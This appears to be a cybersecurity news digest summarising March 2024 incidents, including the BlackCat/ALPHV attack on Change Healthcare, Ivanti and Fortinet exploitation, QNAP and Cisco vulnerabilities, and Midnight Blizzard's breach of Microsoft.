Daily Brief

A Chrome extension named Under New Management has been released to warn users about ownership changes in their installed extensions, which may lead to potential security risks. Developer Matt Frisbie created the tool to combat the issue of extension hijacking, where new owners of popular extensions could inject malicious code for data theft, ad injection, or cryptomining. Google has been focusing on detecting malicious code through sophisticated automatic analysis tools, and the Under New Management extension aims to supplement these efforts by providing user alerts. Ownership changes in extensions are a concern because they can easily occur without meaningful oversight, potentially affecting a vast number of users given Chrome's extensive user base and the automatic update feature of extensions. Frisbie, a Google Developer Expert on Browser Extensions, advocates for transparency in ownership changes and is also developing ExBoost, a promotion platform intended to increase safety in the extensions ecosystem. Google's Chrome team has taken an interest in Frisbie's work and is considering implementing an API similar to Under New Management's functionality as an official feature.

BlackCat/ALPHV ransomware operation shut down after law enforcement's infiltration and controversial critical infrastructure targeting. The ransomware group conducted an exit scam, stealing a $22 million ransom and falsely blaming law enforcement intervention. UnitedHealth's Change Healthcare suffered a ransomware attack causing severe disruptions in the US healthcare system, including insurance and prescription billing issues. After the attack, BlackCat claims it's shuttering operations to avoid courtroom battles, likely preparatory to rebranding and restarting their criminal activities. Swiss government disclosed a Play ransomware attack resulting in the leak of 65,000 sensitive documents. FBI's Internet Crime Complaint Center reported that the U.S. incurred a record $12.5 billion loss to online crime in 2023. Noteworthy cyber incidents included ransomware attacks on Belgian beer maker Duvel Moortgat Brewery and UK outsourcing company Capita. Other ransomware updates included new variants of STOP, SkyNet, Makop, and MedusaLocker ransomware identified by cybersecurity researchers.

New cybercrime group Magnet Goblin has been exploiting vulnerabilities in Ivanti devices to penetrate US medical, manufacturing, and energy sectors. The group acted swiftly, utilizing an Ivanti exploit one day after the public release of a corresponding proof-of-concept (PoC). The US Cybersecurity and Infrastructure Security Agency (CISA) detected compromises in two of its systems using Ivanti products, but operations remained unaffected due to robust incident response measures. Magnet Goblin deployed multiple forms of malware, including MiniNerbian and NerbianRAT, as well as using legitimate tools like ScreenConnect and AnyDesk for remote access, complicating detection processes. The fast exploitation of "one-day vulnerabilities" by Magnet Goblin underscores a major threat to global digital infrastructure, as vendors often haven't issued patches quickly enough. While typically attributed to state-sponsored actors, cybercriminals of various affiliations, including Magnet Goblin, have been leveraging Ivanti's security holes. CISA advises heightened vigilance and review of their recent advisory on Ivanti. Arctic Wolf linked some of the attacks, related to the Qlik Sense exploits, to subsequent infections with Cactus ransomware, demonstrating the diverse malicious strategies being employed.

The BlackCat/ALPHV ransomware gang closed operations after purportedly conning an affiliate of a $22 million ransom from Optum, part of UnitedHealth Group. Law enforcement breached the ransomware group's servers, leading to an escalatory targeting of US critical infrastructure. The FBI's months-long infiltration allowed seizure of the gang's data leak site domain amid a tug-of-war battle. BlackCat's attack on Change Healthcare disrupted US healthcare, hindering pharmacy operations and causing patients to face full medication prices. Despite paying the ransom, Optum did not receive its promised share due to what BlackCat claimed was federal seizure but was, in reality, an exit scam. Other ransomware news includes the attack on Belgian beer maker Duvel and the Swiss government reporting a leak of 65,000 documents due to a ransomware attack. The FBI's Internet Crime Complaint Center reported a record loss of $12.5 billion to online crime in 2023. Discussions about banning ransom payments are intensifying as cybercriminals continue to profit significantly from their attacks.

Approximately 150,000 Fortinet devices globally are susceptible to CVE-2024-21762, a significant security vulnerability permitting unauthenticated code execution. CISA has included the flaw in its Known Exploited Vulnerabilities catalog, confirming that it's actively being exploited. The Shadowserver Foundation detected the exposed devices, which still include the vulnerability nearly a month after Fortinet issued a fix. The majority of the vulnerable devices are located in the United States, with India, Brazil, and Canada also hosting a significant number. Information on the actual exploitation of CVE-2024-21762 is limited, suggesting possible use in targeted attacks by sophisticated threat actors. Companies can use a Python script provided by BishopFox to assess the vulnerability status of their SSL VPN systems. Fortinet's FortiOS and FortiProxy are critical to the security infrastructure, providing services such as DoS protection, IPS, firewall, VPN, and secure web proxy.

QNAP warns of critical vulnerabilities in NAS software that can allow unauthorized access. Three disclosed flaws include authentication bypass, command injection, and SQL injection. The most critical flaw, an auth bypass vulnerability CVE-2024-21899, can be exploited remotely with low complexity. Affected QNAP operating systems are QTS 5.1.x, QTS 4.5.x, QuTS hero h5.1.x, h4.5.x, QuTScloud c5.x, and myQNAPcloud 1.0.x. Users are urged to update their system firmware as soon as possible to mitigate the risks. Due to large amounts of valuable data stored, NAS devices are prime targets for attacks, including ransomware. Past incidents involve ransomware groups like DeadBolt, Checkmate, and Qlocker exploiting NAS vulnerabilities.

UnitedHealth Group's Change Healthcare platform suffered a significant ransomware attack by ALPHV/BlackCat, debilitating systems and disrupting U.S. healthcare operations. The cyberattack, which took place on February 21, 2024, led to the encryption of servers and IT systems shutdown, directly impacting the processing of pharmaceutical claims and payments. As of March 7, the company has restored electronic prescription systems and payment transmissions, with medical claims processing resuming with a throughput of 90% and expected to improve shortly. Change Healthcare has announced that full restoration of electronic payments platforms is targeted for March 15, with initial testing for medical claims systems set for March 18, 2024. UnitedHealth Group offers interim solutions and encourages stakeholders to utilize workarounds for continuity, though warns of potential instability during the recovery phase. In response to the financial constraints faced by healthcare providers, Optum launched a temporary funding assistance program, and the U.S. Department of Health and Human Services has announced measures to mitigate the attack's impact. Reports indicate that a $22 million ransom may have been paid to prevent data leakage and secure a file decryptor, amidst claims of an exit scam by the BlackCat ransomware group.

Microsoft confirms that Russian espionage group Midnight Blizzard, linked to Cozy Bear and APT29, stole source code and internal information. The breach, part of an ongoing intrusion, initially focused on a small number of executive email accounts, from which internal messages and documents were taken. No evidence has been found that customer data, production systems, or AI systems have been compromised, despite the attackers' efforts. The threat actors have used information obtained from company emails to attempt unauthorized access to other internal systems and repositories. Microsoft is actively contacting customers who may be impacted by the breach to help implement mitigating measures. The intensity of password spray attacks increased significantly in February, indicating that the espionage efforts are continuing to escalate. Despite the security breach, Microsoft reports no financial impact on its operations and commits to ongoing investigations and sharing updates with the public. The attack underscores the sophistication of nation-state actors in the current global threat landscape and their capacity for coordinated, resource-intensive cyber operations.

Russian hackers known as 'Midnight Blizzard' compromised internal systems at Microsoft, gaining access to source code. The attack was initiated using stolen authentication secrets from a cyberattack in January, involving a password spray attack on Microsoft's corporate email servers. The accessed test account did not employ multi-factor authentication, allowing threat actors to penetrate further into Microsoft's systems. Microsoft observed a significant uptick in password spray attacks in February, with a tenfold increase from January, which underscores the importance of enabling multi-factor authentication. Customers potentially affected by the leak of secrets in stolen emails are being contacted by Microsoft for mitigation assistance. No evidence suggests that customer-facing systems hosted by Microsoft have been compromised. Microsoft has since increased security measures and coordination both enterprise-wide and with federal law enforcement to combat such advanced persistent threats.

Change Healthcare suffered a ransomware attack in February, debilitating their services which severely affected hospitals and pharmacies across the US. Electronic prescription services have been restored, signaling the commencement of a path to full recovery. UnitedHealth Group, owner of Change Healthcare, indicated that electronic payments and medical claims management systems are on track for restoration by mid-March. The US government, acknowledging disruptions, allowed temporary advance funding for Medicare services to mitigate cash flow challenges in the healthcare sector. The attack is attributed to the ALPHV/BlackCat ransomware gang, which potentially collected $22 million and has indicated a shutdown through an apparent exit scam. Investigations are ongoing, with involvement from the UK's National Crime Agency and Europol, while the FBI has not yet provided comments on the closure of the ALPHV operations.

Meta is aligning WhatsApp and Messenger with the EU’s Digital Markets Act (DMA) to facilitate interoperability with third-party messaging services. The DMA enforceable from March 7, 2024, targets major tech companies to prevent anti-competitive practices and promotes a level playing field. Meta requires third-party services to use Signal Protocol for end-to-end encryption and XML for encrypted communications. A proposed "plug-and-play" model by Meta would allow third-party clients to connect to their servers using custom protocols for seamless integration. Third-party clients must adhere to technical requirements, including authentication and the WhatsApp Enlistment API, to join WhatsApp or Messenger networks. Meta points out challenges such as potential data leaks and reduced efficacy in preventing spam when third-party proxies are used between clients. The interoperability move is set to transform the messaging landscape in the EU, impacting how consumers and businesses communicate across platforms.

The Swiss government's IT supplier Xplain was breached by the Play ransomware gang, resulting in the theft of 65,000 files relating to the Swiss Federal Administration. The National Cyber Security Center (NCSC) reported that a total of 1.3 million files were taken during the May 2023 incident, with 5 percent related to the government, including classified documents and personal information. Personal data compromised included names, addresses, and phone numbers, while technical and classified files were also among the stolen data. Only a small fraction of the leaked files contained readable passwords, but the breach still represented a significant security lapse. An administrative investigation began in August 2023 to analyze the breach at Xplain, with the final report expected to provide recommendations to prevent similar incidents. The Swiss federal offices and service providers coordinated closely under the NCSC to manage the incident and mitigate its impact.

Secrets management is critical for cybersecurity, focusing on the protection of API keys, connection strings, and certificates. Common secrets management mistakes include improper storage, weak encryption of secrets at rest, and lack of proactive strategies. Kubernetes supports encryption of secrets at rest, but this requires careful configuration to ensure security. Reducing false positives is key to maintaining operational efficiency, allowing security teams to focus on real threats. A proper secrets management approach involves integrating it into the development lifecycle and avoiding hard-coded secrets. Vaults for secrets management should be monitored for misconfigurations and excess access risks. Best practices in secrets management include a culture of security mindfulness and continuous adaptation to new cybersecurity challenges. Entro offers a full-context platform to address secrets management challenges, monitor risks, and provide insights for decision-making.

Cisco has released updates to remedy a high-severity vulnerability in its Secure Client software which could let attackers hijack VPN sessions. Identified as CVE-2024-20337 with a CVSS score of 8.2, the flaw is due to improper validation of user input and enables CRLF injection attacks. Exploiting this flaw, an attacker can use a specially crafted link to execute arbitrary script code or access sensitive information such as SAML tokens. The compromised SAML tokens could be used by the attacker to start a VPN session with the privileges of the affected user, although additional credentials are still required for deeper network access. The vulnerability affects Secure Client versions for Windows, Linux, and macOS, and is fixed in the updated releases. Researcher Paulos Yibelo Mesfin is credited with discovering the flaw and suggests that it could allow attackers to penetrate local internal networks. Another separate high-severity issue, CVE-2024-20338, affecting Secure Client for Linux, was also patched. It allowed privilege escalation and has been fixed in version 5.1.2.42.

Threat actors exploited QEMU, an open-source hardware emulator, to create a network tunnel in a cyber attack on a large company. Kaspersky researchers discovered the innovative use of QEMU to connect to the victim's infrastructure without direct internet access. This incident represents the first documented case of QEMU being utilized by adversaries as tunneling software in a cyber attack. The attackers leveraged a virtual network interface and a socket-type network interface to enable communication with a remote server. The method allowed for the blending of malicious traffic with legitimate activity, making detection more challenging. Experts are reminded of the importance of multi-level protection strategies to combat complex and targeted attacks, which include both endpoint protection and advanced threat detection systems. The attack signifies an evolving threat landscape where legitimate tools are repurposed for malicious intent, stressing the need for continuous vigilance and updated security measures.